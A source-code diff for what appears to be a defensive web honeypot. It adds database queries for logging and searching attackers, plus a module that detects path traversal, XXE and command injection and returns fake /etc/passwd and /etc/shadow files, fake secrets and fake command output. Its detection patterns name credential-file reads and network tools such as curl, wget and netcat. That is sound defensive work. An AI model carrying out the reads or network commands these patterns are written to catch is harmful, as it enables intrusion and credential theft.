reverse: + ip_stats.reverse = reverse + if is_proxy is not None: + ip_stats.is_proxy = is_proxy + if is_hosting is not None: + ip_stats.is_hosting = is_hosting session.commit() except Exception as e: session.rollback() @@ -553,6 +788,161 @@ class DatabaseManager: finally: self.close_session() + def get_ips_needing_reevaluation(self) -> List[str]: + """ + Get all IP addresses that need evaluation. + + Returns: + List of IP addresses where need_reevaluation is True + or that have never been analyzed (last_analysis is NULL) + """ + session = self.session + try: + ips = ( + session.query(IpStats.ip) + .filter( + or_( + IpStats.need_reevaluation == True, + IpStats.last_analysis.is_(None), + ) + ) + .all() + ) + return [ip[0] for ip in ips] + finally: + self.close_session() + + def flag_stale_ips_for_reevaluation(self) -> int: + """ + Flag IPs for reevaluation where: + - last_seen is between 5 and 30 days ago + - last_analysis is more than 5 days ago + + Returns: + Number of IPs flagged for reevaluation + """ + session = self.session + try: + now = datetime.now() + last_seen_lower = now - timedelta(days=30) + last_seen_upper = now - timedelta(days=5) + last_analysis_cutoff = now - timedelta(days=5) + + count = ( + session.query(IpStats) + .filter( + IpStats.last_seen >= last_seen_lower, + IpStats.last_seen <= last_seen_upper, + IpStats.last_analysis <= last_analysis_cutoff, + IpStats.need_reevaluation == False, + IpStats.manual_category == False, + ) + .update( + {IpStats.need_reevaluation: True}, + synchronize_session=False, + ) + ) + session.commit() + return count + except Exception as e: + session.rollback() + raise + + def flag_all_ips_for_reevaluation(self) -> int: + """ + Flag ALL IPs for reevaluation, regardless of staleness. + Skips IPs that have a manual category set. + + Returns: + Number of IPs flagged for reevaluation + """ + session = self.session + try: + count = ( + session.query(IpStats) + .filter( + IpStats.need_reevaluation == False, + IpStats.manual_category == False, + ) + .update( + {IpStats.need_reevaluation: True}, + synchronize_session=False, + ) + ) + session.commit() + return count + except Exception as e: + session.rollback() + raise + + def get_access_logs_paginated( + self, + page: int = 1, + page_size: int = 25, + ip_filter: Optional[str] = None, + suspicious_only: bool = False, + since_minutes: Optional[int] = None, + ) -> Dict[str, Any]: + """ + Retrieve access logs with pagination and optional filtering. + + Args: + page: Page to retrieve + page_size: Number of records for page + ip_filter: Filter by IP address + suspicious_only: Only return suspicious requests + since_minutes: Only return logs from the last N minutes + + Returns: + List of access log dictionaries + """ + session = self.session + try: + offset = (page - 1) * page_size + query = session.query(AccessLog).order_by(AccessLog.timestamp.desc()) + + if ip_filter: + query = query.filter(AccessLog.ip == sanitize_ip(ip_filter)) + if suspicious_only: + query = query.filter(AccessLog.is_suspicious == True) + if since_minutes is not None: + cutoff_time = datetime.now() - timedelta(minutes=since_minutes) + query = query.filter(AccessLog.timestamp >= cutoff_time) + + logs = query.offset(offset).limit(page_size).all() + # Get total count of attackers + total_access_logs = ( + session.query(AccessLog) + .filter(AccessLog.ip == sanitize_ip(ip_filter)) + .count() + ) + total_pages = (total_access_logs + page_size - 1) // page_size + + return { + "access_logs": [ + { + "id": log.id, + "ip": log.ip, + "path": log.path, + "user_agent": log.user_agent, + "method": log.method, + "is_suspicious": log.is_suspicious, + "is_honeypot_trigger": log.is_honeypot_trigger, + "timestamp": log.timestamp.isoformat(), + "attack_types": [d.attack_type for d in log.attack_detections], + } + for log in logs + ], + "pagination": { + "page": page, + "page_size": page_size, + "total_logs": total_access_logs, + "total_pages": total_pages, + }, + } + finally: + self.close_session() + def get_access_logs( self, limit: int = 100, @@ -714,8 +1104,18 @@ class DatabaseManager: "last_seen": stat.last_seen.isoformat() if stat.last_seen else None, "country_code": stat.country_code, "city": stat.city, + "country": stat.country, + "region": stat.region, + "region_name": stat.region_name, + "timezone": stat.timezone, + "latitude": stat.latitude, + "longitude": stat.longitude, + "isp": stat.isp, + "reverse": stat.reverse, "asn": stat.asn, "asn_org": stat.asn_org, + "is_proxy": stat.is_proxy, + "is_hosting": stat.is_hosting, "list_on": stat.list_on or {}, "reputation_score": stat.reputation_score, "reputation_source": stat.reputation_source, @@ -922,6 +1322,27 @@ class DatabaseManager: finally: self.close_session() + def _public_ip_filter(self, query, ip_column, server_ip: Optional[str] = None): + """Apply SQL-level filters to exclude local/private IPs and server IP.""" + query = query.filter( + ~ip_column.like("10.%"), + ~ip_column.like("172.16.%"), + ~ip_column.like("172.17.%"), + ~ip_column.like("172.18.%"), + ~ip_column.like("172.19.%"), + ~ip_column.like("172.2_.%"), + ~ip_column.like("172.30.%"), + ~ip_column.like("172.31.%"), + ~ip_column.like("192.168.%"), + ~ip_column.like("127.%"), + ~ip_column.like("0.%"), + ~ip_column.like("169.254.%"), + ip_column != "::1", + ) + if server_ip: + query = query.filter(ip_column != server_ip) + return query + def get_dashboard_counts(self) -> Dict[str, int]: """ Get aggregate statistics for the dashboard (excludes local/private IPs and server IP). @@ -932,43 +1353,43 @@ class DatabaseManager: """ session = self.session try: - # Get server IP to filter it out from config import get_config config = get_config() server_ip = config.get_server_ip() - # Get all accesses first, then filter out local IPs and server IP - all_accesses = session.query(AccessLog).all() - - # Filter out local/private IPs and server IP - public_accesses = [ - log for log in all_accesses if is_valid_public_ip(log.ip, server_ip) - ] - - # Calculate counts from filtered data - total_accesses = len(public_accesses) - unique_ips = len(set(log.ip for log in public_accesses)) - unique_paths = len(set(log.path for log in public_accesses)) - suspicious_accesses = sum(1 for log in public_accesses if log.is_suspicious) - honeypot_triggered = sum( - 1 for log in public_accesses if log.is_honeypot_trigger - ) - honeypot_ips = len( - set(log.ip for log in public_accesses if log.is_honeypot_trigger) + # Single aggregation query instead of loading all rows + base = session.query( + func.count(AccessLog.id).label("total_accesses"), + func.count(distinct(AccessLog.ip)).label("unique_ips"), + func.count(distinct(AccessLog.path)).label("unique_paths"), + func.count(case((AccessLog.is_suspicious == True, 1))).label( + "suspicious_accesses" + ), + func.count(case((AccessLog.is_honeypot_trigger == True, 1))).label( + "honeypot_triggered" + ), ) + base = self._public_ip_filter(base, AccessLog.ip, server_ip) + row = base.one() + + # Honeypot unique IPs (separate query for distinct on filtered subset) + hp_query = session.query(func.count(distinct(AccessLog.ip))).filter( + AccessLog.is_honeypot_trigger == True + ) + hp_query = self._public_ip_filter(hp_query, AccessLog.ip, server_ip) + honeypot_ips = hp_query.scalar() or 0 - # Count unique attackers from IpStats (matching the "Attackers by Total Requests" table) unique_attackers = ( session.query(IpStats).filter(IpStats.category == "attacker").count() ) return { - "total_accesses": total_accesses, - "unique_ips": unique_ips, - "unique_paths": unique_paths, - "suspicious_accesses": suspicious_accesses, - "honeypot_triggered": honeypot_triggered, + "total_accesses": row.total_accesses or 0, + "unique_ips": row.unique_ips or 0, + "unique_paths": row.unique_paths or 0, + "suspicious_accesses": row.suspicious_accesses or 0, + "honeypot_triggered": row.honeypot_triggered or 0, "honeypot_ips": honeypot_ips, "unique_attackers": unique_attackers, } @@ -987,26 +1408,16 @@ class DatabaseManager: """ session = self.session try: - # Get server IP to filter it out from config import get_config config = get_config() server_ip = config.get_server_ip() - results = ( - session.query(AccessLog.ip, func.count(AccessLog.id).label("count")) - .group_by(AccessLog.ip) - .order_by(func.count(AccessLog.id).desc()) - .all() - ) + query = session.query(IpStats.ip, IpStats.total_requests) + query = self._public_ip_filter(query, IpStats.ip, server_ip) + results = query.order_by(IpStats.total_requests.desc()).limit(limit).all() - # Filter out local/private IPs and server IP, then limit results - filtered = [ - (row.ip, row.count) - for row in results - if is_valid_public_ip(row.ip, server_ip) - ] - return filtered[:limit] + return [(row.ip, row.total_requests) for row in results] finally: self.close_session() @@ -1073,23 +1484,18 @@ class DatabaseManager: """ session = self.session try: - # Get server IP to filter it out from config import get_config config = get_config() server_ip = config.get_server_ip() - logs = ( + query = ( session.query(AccessLog) .filter(AccessLog.is_suspicious == True) .order_by(AccessLog.timestamp.desc()) - .all() ) - - # Filter out local/private IPs and server IP - filtered_logs = [ - log for log in logs if is_valid_public_ip(log.ip, server_ip) - ] + query = self._public_ip_filter(query, AccessLog.ip, server_ip) + logs = query.limit(limit).all() return [ { @@ -1098,7 +1504,7 @@ class DatabaseManager: "user_agent": log.user_agent, "timestamp": log.timestamp.isoformat(), } - for log in filtered_logs[:limit] + for log in logs ] finally: self.close_session() @@ -1203,44 +1609,59 @@ class DatabaseManager: offset = (page - 1) * page_size - # Get honeypot triggers grouped by IP - results = ( - session.query(AccessLog.ip, AccessLog.path) - .filter(AccessLog.is_honeypot_trigger == True) - .all() + # Count distinct paths per IP using SQL GROUP BY + count_col = func.count(distinct(AccessLog.path)).label("path_count") + base_query = session.query(AccessLog.ip, count_col).filter( + AccessLog.is_honeypot_trigger == True + ) + base_query = self._public_ip_filter(base_query, AccessLog.ip, server_ip) + base_query = base_query.group_by(AccessLog.ip) + + # Get total count of distinct honeypot IPs + total_honeypots = base_query.count() + + # Apply sorting + if sort_by == "count": + order_expr = ( + count_col.desc() if sort_order == "desc" else count_col.asc() + ) + else: + order_expr = ( + AccessLog.ip.desc() if sort_order == "desc" else AccessLog.ip.asc() + ) + + ip_rows = ( + base_query.order_by(order_expr).offset(offset).limit(page_size).all() ) - # Group paths by IP, filtering out invalid IPs - ip_paths: Dict[str, List[str]] = {} - for row in results: - if not is_valid_public_ip(row.ip, server_ip): - continue - if row.ip not in ip_paths: - ip_paths[row.ip] = [] - if row.path not in ip_paths[row.ip]: - ip_paths[row.ip].append(row.path) - - # Create list and sort - honeypot_list = [ - {"ip": ip, "paths": paths, "count": len(paths)} - for ip, paths in ip_paths.items() - ] - - if sort_by == "count": - honeypot_list.sort( - key=lambda x: x["count"], reverse=(sort_order == "desc") - ) - else: # sort by ip - honeypot_list.sort( - key=lambda x: x["ip"], reverse=(sort_order == "desc") + # Fetch distinct paths only for the paginated IPs + paginated_ips = [row.ip for row in ip_rows] + honeypot_list = [] + if paginated_ips: + path_rows = ( + session.query(AccessLog.ip, AccessLog.path) + .filter( + AccessLog.is_honeypot_trigger == True, + AccessLog.ip.in_(paginated_ips), + ) + .distinct(AccessLog.ip, AccessLog.path) + .all() ) + ip_paths: Dict[str, List[str]] = {} + for row in path_rows: + ip_paths.setdefault(row.ip, []).append(row.path) - total_honeypots = len(honeypot_list) - paginated = honeypot_list[offset : offset + page_size] - total_pages = (total_honeypots + page_size - 1) // page_size + # Preserve the order from the sorted query + for row in ip_rows: + paths = ip_paths.get(row.ip, []) + honeypot_list.append( + {"ip": row.ip, "paths": paths, "count": row.path_count} + ) + + total_pages = max(1, (total_honeypots + page_size - 1) // page_size) return { - "honeypots": paginated, + "honeypots": honeypot_list, "pagination": { "page": page, "page_size": page_size, @@ -1339,6 +1760,9 @@ class DatabaseManager: """ Retrieve paginated list of top IP addresses by access count. + Uses the IpStats table (which already stores total_requests per IP) + instead of doing a costly GROUP BY on the large access_logs table. + Args: page: Page number (1-indexed) page_size: Number of results per page @@ -1357,30 +1781,34 @@ class DatabaseManager: offset = (page - 1) * page_size - results = ( - session.query(AccessLog.ip, func.count(AccessLog.id).label("count")) - .group_by(AccessLog.ip) - .all() - ) + base_query = session.query(IpStats) + base_query = self._public_ip_filter(base_query, IpStats.ip, server_ip) - # Filter out local/private IPs and server IP, then sort - filtered = [ - {"ip": row.ip, "count": row.count} - for row in results - if is_valid_public_ip(row.ip, server_ip) - ] + total_ips = base_query.count() if sort_by == "count": - filtered.sort(key=lambda x: x["count"], reverse=(sort_order == "desc")) - else: # sort by ip - filtered.sort(key=lambda x: x["ip"], reverse=(sort_order == "desc")) + order_col = IpStats.total_requests + else: + order_col = IpStats.ip - total_ips = len(filtered) - paginated = filtered[offset : offset + page_size] - total_pages = (total_ips + page_size - 1) // page_size + if sort_order == "desc": + base_query = base_query.order_by(order_col.desc()) + else: + base_query = base_query.order_by(order_col.asc()) + + results = base_query.offset(offset).limit(page_size).all() + + total_pages = max(1, (total_ips + page_size - 1) // page_size) return { - "ips": paginated, + "ips": [ + { + "ip": row.ip, + "count": row.total_requests, + "category": row.category or "unknown", + } + for row in results + ], "pagination": { "page": page, "page_size": page_size, @@ -1414,28 +1842,32 @@ class DatabaseManager: try: offset = (page - 1) * page_size - results = ( - session.query(AccessLog.path, func.count(AccessLog.id).label("count")) - .group_by(AccessLog.path) - .all() + count_col = func.count(AccessLog.id).label("count") + + # Get total number of distinct paths + total_paths = ( + session.query(func.count(distinct(AccessLog.path))).scalar() or 0 ) - # Create list and sort - paths_list = [{"path": row.path, "count": row.count} for row in results] + # Build query with SQL-level sorting and pagination + query = session.query(AccessLog.path, count_col).group_by(AccessLog.path) if sort_by == "count": - paths_list.sort( - key=lambda x: x["count"], reverse=(sort_order == "desc") + order_expr = ( + count_col.desc() if sort_order == "desc" else count_col.asc() + ) + else: + order_expr = ( + AccessLog.path.desc() + if sort_order == "desc" + else AccessLog.path.asc() ) - else: # sort by path - paths_list.sort(key=lambda x: x["path"], reverse=(sort_order == "desc")) - total_paths = len(paths_list) - paginated = paths_list[offset : offset + page_size] - total_pages = (total_paths + page_size - 1) // page_size + results = query.order_by(order_expr).offset(offset).limit(page_size).all() + total_pages = max(1, (total_paths + page_size - 1) // page_size) return { - "paths": paginated, + "paths": [{"path": row.path, "count": row.count} for row in results], "pagination": { "page": page, "page_size": page_size, @@ -1469,33 +1901,44 @@ class DatabaseManager: try: offset = (page - 1) * page_size - results = ( - session.query( - AccessLog.user_agent, func.count(AccessLog.id).label("count") - ) - .filter(AccessLog.user_agent.isnot(None), AccessLog.user_agent != "") - .group_by(AccessLog.user_agent) - .all() + count_col = func.count(AccessLog.id).label("count") + + base_filter = [AccessLog.user_agent.isnot(None), AccessLog.user_agent != ""] + + # Get total number of distinct user agents + total_uas = ( + session.query(func.count(distinct(AccessLog.user_agent))) + .filter(*base_filter) + .scalar() + or 0 ) - # Create list and sort - ua_list = [ - {"user_agent": row.user_agent, "count": row.count} for row in results - ] + # Build query with SQL-level sorting and pagination + query = ( + session.query(AccessLog.user_agent, count_col) + .filter(*base_filter) + .group_by(AccessLog.user_agent) + ) if sort_by == "count": - ua_list.sort(key=lambda x: x["count"], reverse=(sort_order == "desc")) - else: # sort by user_agent - ua_list.sort( - key=lambda x: x["user_agent"], reverse=(sort_order == "desc") + order_expr = ( + count_col.desc() if sort_order == "desc" else count_col.asc() + ) + else: + order_expr = ( + AccessLog.user_agent.desc() + if sort_order == "desc" + else AccessLog.user_agent.asc() ) - total_uas = len(ua_list) - paginated = ua_list[offset : offset + page_size] - total_pages = (total_uas + page_size - 1) // page_size + results = query.order_by(order_expr).offset(offset).limit(page_size).all() + total_pages = max(1, (total_uas + page_size - 1) // page_size) return { - "user_agents": paginated, + "user_agents": [ + {"user_agent": row.user_agent, "count": row.count} + for row in results + ], "pagination": { "page": page, "page_size": page_size, @@ -1512,6 +1955,7 @@ class DatabaseManager: page_size: int = 5, sort_by: str = "timestamp", sort_order: str = "desc", + ip_filter: Optional[str] = None, ) -> Dict[str, Any]: """ Retrieve paginated list of detected attack types with access logs. @@ -1521,6 +1965,7 @@ class DatabaseManager: page_size: Number of results per page sort_by: Field to sort by (timestamp, ip, attack_type) sort_order: Sort order (asc or desc) + ip_filter: Optional IP address to filter results Returns: Dictionary with attacks list and pagination info @@ -1536,8 +1981,22 @@ class DatabaseManager: sort_order.lower() if sort_order.lower() in {"asc", "desc"} else "desc" ) - # Get all access logs with attack detections + # Base query filter + base_filters = [] + if ip_filter: + base_filters.append(AccessLog.ip == ip_filter) + + # Count total unique access logs with attack detections + count_query = session.query(AccessLog).join(AttackDetection) + if base_filters: + count_query = count_query.filter(*base_filters) + total_attacks = count_query.distinct(AccessLog.id).count() + + # Get paginated access logs with attack detections query = session.query(AccessLog).join(AttackDetection) + if base_filters: + query = query.filter(*base_filters) + query = query.distinct(AccessLog.id) if sort_by == "timestamp": query = query.order_by( @@ -1550,29 +2009,23 @@ class DatabaseManager: AccessLog.ip.desc() if sort_order == "desc" else AccessLog.ip.asc() ) - logs = query.all() + # Apply LIMIT and OFFSET at database level + logs = query.offset(offset).limit(page_size).all() - # Convert to attack list - attack_list = [ + # Convert to attack list (exclude raw_request for performance - it's too large) + paginated = [ { + "id": log.id, "ip": log.ip, "path": log.path, "user_agent": log.user_agent, "timestamp": log.timestamp.isoformat() if log.timestamp else None, "attack_types": [d.attack_type for d in log.attack_detections], + "raw_request": log.raw_request, # Keep for backward compatibility } for log in logs ] - # Sort by attack_type if needed (this must be done post-fetch since it's in a related table) - if sort_by == "attack_type": - attack_list.sort( - key=lambda x: x["attack_types"][0] if x["attack_types"] else "", - reverse=(sort_order == "desc"), - ) - - total_attacks = len(attack_list) - paginated = attack_list[offset : offset + page_size] total_pages = (total_attacks + page_size - 1) // page_size return { @@ -1587,6 +2040,188 @@ class DatabaseManager: finally: self.close_session() + def get_raw_request_by_id(self, log_id: int) -> Optional[str]: + """ + Retrieve raw HTTP request for a specific access log ID. + + Args: + log_id: The access log ID + + Returns: + The raw request string, or None if not found or not available + """ + session = self.session + try: + access_log = session.query(AccessLog).filter(AccessLog.id == log_id).first() + if access_log: + return access_log.raw_request + return None + finally: + self.close_session() + + def get_attack_types_stats( + self, limit: int = 20, ip_filter: str | None = None + ) -> Dict[str, Any]: + """ + Get aggregated statistics for attack types (efficient for large datasets). + + Args: + limit: Maximum number of attack types to return + ip_filter: Optional IP address to filter results for + + Returns: + Dictionary with attack type counts + """ + session = self.session + try: + from sqlalchemy import func + + # Aggregate attack types with count + query = session.query( + AttackDetection.attack_type, + func.count(AttackDetection.id).label("count"), + ) + + if ip_filter: + query = query.join( + AccessLog, AttackDetection.access_log_id == AccessLog.id + ).filter(AccessLog.ip == ip_filter) + + results = ( + query.group_by(AttackDetection.attack_type) + .order_by(func.count(AttackDetection.id).desc()) + .limit(limit) + .all() + ) + + return { + "attack_types": [ + {"type": row.attack_type, "count": row.count} for row in results + ] + } + finally: + self.close_session() + + def search_attacks_and_ips( + self, + query: str, + page: int = 1, + page_size: int = 20, + ) -> Dict[str, Any]: + """ + Search attacks and IPs matching a query string. + + Searches across AttackDetection (attack_type, matched_pattern), + AccessLog (ip, path), and IpStats (ip, city, country, isp, asn_org). + + Args: + query: Search term (partial match) + page: Page number (1-indexed) + page_size: Results per page + + Returns: + Dictionary with matching attacks, ips, and pagination info + """ + session = self.session + try: + offset = (page - 1) * page_size + like_q = f"%{query}%" + + # --- Search attacks (AccessLog + AttackDetection) --- + attack_query = ( + session.query(AccessLog) + .join(AttackDetection) + .filter( + or_( + AccessLog.ip.ilike(like_q), + AccessLog.path.ilike(like_q), + AttackDetection.attack_type.ilike(like_q), + AttackDetection.matched_pattern.ilike(like_q), + ) + ) + .distinct(AccessLog.id) + ) + + total_attacks = attack_query.count() + attack_logs = ( + attack_query.order_by(AccessLog.timestamp.desc()) + .offset(offset) + .limit(page_size) + .all() + ) + + attacks = [ + { + "id": log.id, + "ip": log.ip, + "path": log.path, + "user_agent": log.user_agent, + "timestamp": log.timestamp.isoformat() if log.timestamp else None, + "attack_types": [d.attack_type for d in log.attack_detections], + "log_id": log.id, + } + for log in attack_logs + ] + + # --- Search IPs (IpStats) --- + ip_query = session.query(IpStats).filter( + or_( + IpStats.ip.ilike(like_q), + IpStats.city.ilike(like_q), + IpStats.country.ilike(like_q), + IpStats.country_code.ilike(like_q), + IpStats.isp.ilike(like_q), + IpStats.asn_org.ilike(like_q), + IpStats.reverse.ilike(like_q), + ) + ) + + total_ips = ip_query.count() + ips = ( + ip_query.order_by(IpStats.total_requests.desc()) + .offset(offset) + .limit(page_size) + .all() + ) + + ip_results = [ + { + "ip": stat.ip, + "total_requests": stat.total_requests, + "first_seen": ( + stat.first_seen.isoformat() if stat.first_seen else None + ), + "last_seen": stat.last_seen.isoformat() if stat.last_seen else None, + "country_code": stat.country_code, + "city": stat.city, + "category": stat.category, + "isp": stat.isp, + "asn_org": stat.asn_org, + } + for stat in ips + ] + + total = total_attacks + total_ips + total_pages = max( + 1, (max(total_attacks, total_ips) + page_size - 1) // page_size + ) + + return { + "attacks": attacks, + "ips": ip_results, + "query": query, + "pagination": { + "page": page, + "page_size": page_size, + "total_attacks": total_attacks, + "total_ips": total_ips, + "total": total, + "total_pages": total_pages, + }, + } + finally: + self.close_session() + # Module-level singleton instance _db_manager = DatabaseManager() diff --git a/src/deception_responses.py b/src/deception_responses.py new file mode 100644 index 0000000..6e90ed3 --- /dev/null +++ b/src/deception_responses.py @@ -0,0 +1,655 @@ +#!/usr/bin/env python3 + +import re +import secrets +import logging +import json +from typing import Optional, Tuple, Dict +from generators import random_username, random_password, random_email +from wordlists import get_wordlists + +logger = logging.getLogger("krawl") +_sysrand = secrets.SystemRandom() + + +def detect_path_traversal(path: str, query: str = "", body: str = "") -> bool: + """Detect path traversal attempts in request""" + full_input = f"{path} {query} {body}" + + wl = get_wordlists() + pattern = wl.attack_patterns.get("path_traversal", "") + + if not pattern: + # Fallback pattern if wordlists not loaded + pattern = r"(\.\.|%2e%2e|/etc/passwd|/etc/shadow)" + + if re.search(pattern, full_input, re.IGNORECASE): + logger.debug(f"Path traversal detected in {full_input[:100]}") + return True + return False + + +def detect_xxe_injection(body: str) -> bool: + """Detect XXE injection attempts in XML payloads""" + if not body: + return False + + wl = get_wordlists() + pattern = wl.attack_patterns.get("xxe_injection", "") + + if not pattern: + # Fallback pattern if wordlists not loaded + pattern = r"( bool: + """Detect command injection attempts""" + full_input = f"{path} {query} {body}" + + logger.debug( + f"[CMD_INJECTION_CHECK] path='{path}' query='{query}' body='{body[:50] if body else ''}'" + ) + logger.debug(f"[CMD_INJECTION_CHECK] full_input='{full_input[:200]}'") + + wl = get_wordlists() + pattern = wl.attack_patterns.get("command_injection", "") + + if not pattern: + # Fallback pattern if wordlists not loaded + pattern = r"(cmd=|exec=|command=|&&|;|\||whoami|id|uname|cat|ls)" + + if re.search(pattern, full_input, re.IGNORECASE): + logger.debug(f"[CMD_INJECTION_CHECK] Command injection pattern matched!") + return True + + logger.debug(f"[CMD_INJECTION_CHECK] No command injection detected") + return False + + +def generate_fake_passwd() -> str: + """Generate fake /etc/passwd content""" + wl = get_wordlists() + passwd_config = wl.fake_passwd + + if not passwd_config: + # Fallback + return "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin" + + users = passwd_config.get("system_users", []) + uid_min = passwd_config.get("uid_min", 1000) + uid_max = passwd_config.get("uid_max", 2000) + gid_min = passwd_config.get("gid_min", 1000) + gid_max = passwd_config.get("gid_max", 2000) + shells = passwd_config.get("shells", ["/bin/bash"]) + + fake_users = [ + f"{random_username()}:x:{_sysrand.randint(uid_min, uid_max)}:{_sysrand.randint(gid_min, gid_max)}::/home/{random_username()}:{secrets.choice(shells)}" + for _ in range(3) + ] + + return "\n".join(users + fake_users) + + +def generate_fake_shadow() -> str: + """Generate fake /etc/shadow content""" + wl = get_wordlists() + shadow_config = wl.fake_shadow + + if not shadow_config: + # Fallback + return "root:$6$rounds=656000$fake_salt_here$fake_hash_data:19000:0:99999:7:::" + + entries = shadow_config.get("system_entries", []) + hash_prefix = shadow_config.get("hash_prefix", "$6$rounds=656000$") + salt_length = shadow_config.get("salt_length", 16) + hash_length = shadow_config.get("hash_length", 86) + + fake_entries = [ + f"{random_username()}:{hash_prefix}{''.join(_sysrand.choices('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789', k=salt_length))}${''.join(_sysrand.choices('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789', k=hash_length))}:19000:0:99999:7:::" + for _ in range(3) + ] + + return "\n".join(entries + fake_entries) + + +def generate_fake_config_file(filename: str) -> str: + """Generate fake configuration file content""" + configs = { + "config.php": """""", + "application.properties": """# Database Configuration +spring.datasource.url=jdbc:mysql://localhost:3306/appdb +spring.datasource.username=dbuser +spring.datasource.password=fake_password_123 +server.port=8080 +jwt.secret=fake_jwt_secret_key_456""", + ".env": """DB_HOST=localhost +DB_PORT=3306 +DB_NAME=production_db +DB_USER=app_user +DB_PASSWORD=fake_env_password_789 +API_KEY=fake_api_key_abc123 +SECRET_TOKEN=fake_secret_token_xyz""", + } + + for key in configs: + if key.lower() in filename.lower(): + return configs[key] + + return f"""# Configuration File +api_endpoint = https://api.example.com +api_key = fake_key_{_sysrand.randint(1000, 9999)} +database_url = mysql://user:fake_pass@localhost/db +secret = fake_secret_{_sysrand.randint(10000, 99999)} +""" + + +def generate_fake_directory_listing(path: str) -> str: + """Generate fake directory listing""" + wl = get_wordlists() + dir_config = wl.directory_listing + + if not dir_config: + # Fallback + return f"Index of {path}

Index of {path}

" + + fake_dirs = dir_config.get("fake_directories", []) + fake_files = dir_config.get("fake_files", []) + + directories = [(d["name"], d["size"], d["perms"]) for d in fake_dirs] + files = [ + (f["name"], str(_sysrand.randint(f["size_min"], f["size_max"])), f["perms"]) + for f in fake_files + ] + + html = f"Index of {path}" + html += f"

Index of {path}


"
+    html += f"{'Name':<40} {'Size':<10} {'Permissions':<15}\n"
+    html += "-" * 70 + "\n"
+
+    for name, size, perms in directories:
+        html += f"{name + '/':<40} {size:<10} {perms:<15}\n"
+
+    for name, size, perms in files:
+        html += f"{name:<40} {size:<10} {perms:<15}\n"
+
+    html += "

" + return html + + +def generate_path_traversal_response(path: str) -> Tuple[str, str, int]: + """Generate fake response for path traversal attempts""" + + path_lower = path.lower() + logger.debug(f"Generating path traversal response for: {path}") + + if "passwd" in path_lower: + logger.debug("Returning fake passwd file") + return (generate_fake_passwd(), "text/plain", 200) + + if "shadow" in path_lower: + logger.debug("Returning fake shadow file") + return (generate_fake_shadow(), "text/plain", 200) + + if any( + ext in path_lower for ext in [".conf", ".config", ".php", ".env", ".properties"] + ): + logger.debug("Returning fake config file") + return (generate_fake_config_file(path), "text/plain", 200) + + if "proc/self" in path_lower: + logger.debug("Returning fake proc info") + return (f"{_sysrand.randint(1000, 9999)}", "text/plain", 200) + + logger.debug("Returning fake directory listing") + return (generate_fake_directory_listing(path), "text/html", 200) + + +def generate_xxe_response(body: str) -> Tuple[str, str, int]: + """Generate fake response for XXE injection attempts""" + wl = get_wordlists() + xxe_config = wl.xxe_responses + + if "file://" in body: + if "passwd" in body: + content = generate_fake_passwd() + elif "shadow" in body: + content = generate_fake_shadow() + else: + content = ( + xxe_config.get("default_content", "root:x:0:0:root:/root:/bin/bash") + if xxe_config + else "root:x:0:0:root:/root:/bin/bash" + ) + + if xxe_config and "file_access" in xxe_config: + template = xxe_config["file_access"]["template"] + response = template.replace("{content}", content) + else: + response = f""" + + success + {content} +""" + return (response, "application/xml", 200) + + if "ENTITY" in body: + if xxe_config and "entity_processed" in xxe_config: + template = xxe_config["entity_processed"]["template"] + entity_values = xxe_config["entity_processed"]["entity_values"] + entity_value = secrets.choice(entity_values) + response = template.replace("{entity_value}", entity_value) + else: + response = """ + + success + Entity processed successfully + fake_entity_content_12345 +""" + return (response, "application/xml", 200) + + if xxe_config and "error" in xxe_config: + template = xxe_config["error"]["template"] + messages = xxe_config["error"]["messages"] + message = secrets.choice(messages) + response = template.replace("{message}", message) + else: + response = """ + + error + External entity processing disabled +""" + return (response, "application/xml", 200) + + +def generate_command_injection_response(input_text: str) -> Tuple[str, str, int]: + """Generate fake command execution output""" + wl = get_wordlists() + cmd_config = wl.command_outputs + + input_lower = input_text.lower() + + # id command + if re.search(r"\bid\b", input_lower): + if cmd_config and "id" in cmd_config: + uid = _sysrand.randint( + cmd_config.get("uid_min", 1000), cmd_config.get("uid_max", 2000) + ) + gid = _sysrand.randint( + cmd_config.get("gid_min", 1000), cmd_config.get("gid_max", 2000) + ) + template = secrets.choice(cmd_config["id"]) + output = template.replace("{uid}", str(uid)).replace("{gid}", str(gid)) + else: + output = f"uid={_sysrand.randint(1000, 2000)}(www-data) gid={_sysrand.randint(1000, 2000)}(www-data) groups={_sysrand.randint(1000, 2000)}(www-data)" + return (output, "text/plain", 200) + + # whoami command + if re.search(r"\bwhoami\b", input_lower): + users = cmd_config.get("whoami", ["www-data"]) if cmd_config else ["www-data"] + return (secrets.choice(users), "text/plain", 200) + + # uname command + if re.search(r"\buname\b", input_lower): + outputs = ( + cmd_config.get("uname", ["Linux server 5.4.0 x86_64"]) + if cmd_config + else ["Linux server 5.4.0 x86_64"] + ) + return (secrets.choice(outputs), "text/plain", 200) + + # pwd command + if re.search(r"\bpwd\b", input_lower): + paths = ( + cmd_config.get("pwd", ["/var/www/html"]) + if cmd_config + else ["/var/www/html"] + ) + return (secrets.choice(paths), "text/plain", 200) + + # ls command + if re.search(r"\bls\b", input_lower): + if cmd_config and "ls" in cmd_config: + files = secrets.choice(cmd_config["ls"]) + else: + files = ["index.php", "config.php", "uploads"] + output = "\n".join( + _sysrand.sample(files, k=_sysrand.randint(3, min(6, len(files)))) + ) + return (output, "text/plain", 200) + + # cat command + if re.search(r"\bcat\b", input_lower): + if "passwd" in input_lower: + return (generate_fake_passwd(), "text/plain", 200) + if "shadow" in input_lower: + return (generate_fake_shadow(), "text/plain", 200) + cat_content = ( + cmd_config.get("cat_config", "") + if cmd_config + else "" + ) + return (cat_content, "text/plain", 200) + + # echo command + if re.search(r"\becho\b", input_lower): + match = re.search(r"echo\s+(.+?)(?:[;&|]|$)", input_text, re.IGNORECASE) + if match: + return (match.group(1).strip("\"'"), "text/plain", 200) + return ("", "text/plain", 200) + + # network commands + if any(cmd in input_lower for cmd in ["wget", "curl", "nc", "netcat"]): + if cmd_config and "network_commands" in cmd_config: + outputs = cmd_config["network_commands"] + output = secrets.choice(outputs) + if "{size}" in output: + size = _sysrand.randint( + cmd_config.get("download_size_min", 100), + cmd_config.get("download_size_max", 10000), + ) + output = output.replace("{size}", str(size)) + else: + outputs = ["bash: command not found", "Connection timeout"] + output = secrets.choice(outputs) + return (output, "text/plain", 200) + + # generic outputs + if cmd_config and "generic" in cmd_config: + generic_outputs = cmd_config["generic"] + output = secrets.choice(generic_outputs) + if 